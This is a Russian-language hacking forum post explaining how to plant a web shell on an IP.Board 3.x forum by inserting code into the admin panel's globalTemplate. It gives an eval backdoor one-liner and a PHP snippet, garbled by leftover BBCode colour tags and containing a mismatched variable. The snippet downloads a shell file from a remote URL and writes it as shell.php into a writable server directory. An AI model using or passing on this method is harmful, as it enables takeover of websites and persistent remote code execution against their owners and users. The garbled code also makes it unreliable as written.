[Обзор уязвимостей IPB]

#11

05.01.2012, 16:25

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

Заливка шелла IPB 3.x

Вроде такого не было:

1) Идем в админку => Внешний вид => IP.Board(текущий шаблон) => globalTemplate

2) Ставим код между тегами и и жмем Сохранить.

3) Ваш код доступен по адрес http://site/forum/index.php

Не советую туда вставлять бэкдор, типа:

if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));

Так как залитый шелл этим бэкдором будет nobody. Поэтому лучше сразу:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/shell.txt); //ваш адрес шелла

[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'/path/to/writeable/dir/'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]//папка доступная для записи

[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$br[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

Тогда шелл будет выполнятся как другие скрипты на сервере.